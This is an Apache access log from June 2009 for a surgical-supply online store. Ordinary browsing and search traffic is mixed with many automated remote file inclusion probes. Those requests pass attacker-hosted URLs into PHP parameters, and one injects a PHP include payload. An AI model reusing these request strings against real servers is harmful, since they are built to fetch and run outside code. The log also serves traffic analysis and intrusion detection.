77.163.94.213 - - [19/Jun/2009:04:43:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
77.163.94.213 - - [19/Jun/2009:04:43:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
77.163.94.213 - - [19/Jun/2009:04:43:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
77.163.94.213 - - [19/Jun/2009:04:43:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
123.143.98.5 - - [19/Jun/2009:04:43:17 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:43:21 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.172.60.242 - - [19/Jun/2009:04:43:26 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://secured-client.com/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:04:43:54 -0400] "GET /images/nav04_shop_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
59.120.99.50 - - [19/Jun/2009:04:44:04 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:04 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:44:06 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
209.59.12.99 - - [19/Jun/2009:04:44:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.120.99.50 - - [19/Jun/2009:04:44:23 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883 HTTP/1.0" 200 38031 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:24 -0400] "GET /images/head_aceLogo.gif HTTP/1.0" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.0" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-shop.gif HTTP/1.0" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-brochures.gif HTTP/1.0" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-space1.gif HTTP/1.0" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_surgical-supply.gif HTTP/1.0" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.0" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.0" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-seminars.gif HTTP/1.0" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-conventions.gif HTTP/1.0" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:25 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.0" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:44:26 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.0" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:26 -0400] "GET /images/blend.jpg HTTP/1.0" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):4883" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:55 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide HTTP/1.0" 200 52840 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:59 -0400] "GET /images/pf-a.gif HTTP/1.0" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:44:59 -0400] "GET /images/space.gif HTTP/1.0" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:45:05 -0400] "GET /images/head_btn-products.gif HTTP/1.0" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:45:05 -0400] "GET /images/head_btn-products-over.gif HTTP/1.0" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:45:05 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.0" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:45:05 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.0" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:45:05 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.0" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:45:05 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.0" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.20.200.82 - - [19/Jun/2009:04:45:05 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.0" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:45:05 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.0" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:45:06 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.0" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.20.200.82 - - [19/Jun/2009:04:45:06 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.0" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:45:06 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.0" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
81.223.126.82 - - [19/Jun/2009:04:45:20 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:04:45:50 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):50001_________________________ HTTP/1.1" 200 76245 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.75.94.229 - - [19/Jun/2009:04:46:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001AAF479952F00047DF026+M37+ENG HTTP/1.0" 200 59261 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):carbide" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
211.75.94.229 - - [19/Jun/2009:04:46:28 -0400] "GET /images/next.gif HTTP/1.0" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001AAF479952F00047DF026+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
59.120.99.50 - - [19/Jun/2009:04:46:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001AAF4D9A62C0009D8F026+M37+ENG HTTP/1.0" 200 45259 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001AAF479952F00047DF026+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
67.208.139.72 - - [19/Jun/2009:04:47:31 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:04:47:31 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:04:47:31 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:04:47:32 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:04:47:32 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:04:47:32 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.116.37.152 - - [19/Jun/2009:04:48:04 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
208.116.37.152 - - [19/Jun/2009:04:48:04 -0400] "GET /logs/access_log.Q109060800/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
208.116.37.152 - - [19/Jun/2009:04:48:04 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:06 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:06 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:06 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:13 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:13 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:13 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:04:48:17 -0400] "GET /logs/access_log.Q109060800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:04:48:19 -0400] "GET /logs/access_log.Q109060800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:26 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:26 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:26 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:48:34 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.116.37.152 - - [19/Jun/2009:04:48:47 -0400] "GET /logs/access_log.Q109060800%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:49:00 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:49:08 -0400] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:49:08 -0400] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:49:08 -0400] "GET /logs/access_log.Q109061300%20%20/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:49:09 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:49:19 -0400] "GET //admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:49:19 -0400] "GET /logs/access_log.Q109052100//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:49:19 -0400] "GET /logs//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:49:19 -0400] "GET /logs/access_log.Q109053000//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:04:49:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.208.139.72 - - [19/Jun/2009:04:49:45 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.208.139.72 - - [19/Jun/2009:04:49:45 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.223.126.82 - - [19/Jun/2009:04:49:57 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.116.37.152 - - [19/Jun/2009:04:50:07 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:50:53 -0400] "GET /logs/access_log.Q109061300/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:50:58 -0400] "GET /logs/access_log.Q109052100%20%20//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:50:59 -0400] "GET /logs/access_log.Q109053000%20%20//admin.cropcanvas.php?cropimagedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:51:03 -0400] "GET ///vwar/backup/errors.php?error=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:51:04 -0400] "GET /logs///vwar/backup/errors.php?error=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:51:04 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:51:10 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:52:05 -0400] "GET /logs/access_log.Q109053100//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:52:08 -0400] "GET /logs/access_log.Q109051600//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.212.27.242 - - [19/Jun/2009:04:52:15 -0400] "GET //common/db.php?commonpath=http://www.louangefm.fr//administrator/components/tirid.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.818"
66.212.27.242 - - [19/Jun/2009:04:52:15 -0400] "GET /logs/access_log.Q109060100//common/db.php?commonpath=http://www.louangefm.fr//administrator/components/tirid.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.818"
66.212.27.242 - - [19/Jun/2009:04:52:15 -0400] "GET /logs//common/db.php?commonpath=http://www.louangefm.fr//administrator/components/tirid.txt%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.818"
66.212.27.242 - - [19/Jun/2009:04:52:16 -0400] "GET /logs/access_log.Q109050800//common/db.php?commonpath=http://www.louangefm.fr//administrator/components/tirid.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.818"
66.249.71.14 - - [19/Jun/2009:04:52:20 -0400] "GET /images/ace_bkgrd_white.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
200.93.147.154 - - [19/Jun/2009:04:52:35 -0400] "GET /logs/access_log.Q109053100//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
200.93.147.154 - - [19/Jun/2009:04:52:52 -0400] "GET /logs/access_log.Q109051600//BaseAdmin.class.php?_CONF[path]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:04:53:50 -0400] "GET /logs/error_log.Q108020100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [19/Jun/2009:04:54:22 -0400] "GET /logs/access_log.Q109051300///?_zb_path=http://www.aboutav.com//back/id.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
218.249.36.194 - - [19/Jun/2009:04:54:22 -0400] "GET ///?_zb_path=http://www.aboutav.com//back/id.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
218.249.36.194 - - [19/Jun/2009:04:54:23 -0400] "GET /logs///?_zb_path=http://www.aboutav.com//back/id.txt? HTTP/1.1" 200 6114 "-" "libwww-perl/5.79"
209.59.12.99 - - [19/Jun/2009:04:54:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.85.63.226 - - [19/Jun/2009:04:55:20 -0400] "GET //booth.php?include_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [19/Jun/2009:04:55:20 -0400] "GET //booth.php?include_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
